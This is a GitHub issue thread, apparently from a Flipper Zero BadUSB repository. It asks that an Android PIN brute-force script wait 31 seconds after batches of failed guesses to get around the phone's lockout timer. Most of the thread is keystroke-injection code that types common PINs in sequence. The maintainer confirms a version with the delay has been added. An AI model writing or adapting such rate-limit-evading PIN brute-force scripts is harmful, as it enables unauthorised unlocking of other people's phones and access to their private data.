### ISSUE TITLE
Android pin brutforce

### ISSUE THREAD

**Issue by technikekb** [SIGUrger/FlipperZeroBadusb#1]
After every 10 incorrect attempts, my device sets the input waiting timer for 30 seconds. 
I need to add a 31000 millisecond input wait to the script after every 10 attempts.
example:
DELAY 500
STRING 1234
ENTER
DELAY 500
STRING 4321 
ENTER
DELAY 500
STRING 1111 
ENTER
DELAY 500
STRING 2222 
ENTER
DELAY 500
STRING 3333 
ENTER
DELAY 500
STRING 0088
ENTER
DELAY 31000 

DELAY 500
STRING 4444
ENTER
DELAY 500
STRING 5555
ENTER
DELAY 500
STRING 6666 
ENTER
DELAY 500
STRING 7777 
ENTER
DELAY 500
STRING 8888 
ENTER
DELAY 500
STRING 2009
ENTER
DELAY 31000

**Comment by SIGUrger** [comment]
I made it for a old device of mine where I had no cooldown or lockdown limit I will add a version of the  common passwords one today where it has your delay

**Comment by SIGUrger** [comment]
its been added with this ^ commit. tell me if its done correctly like u wanted
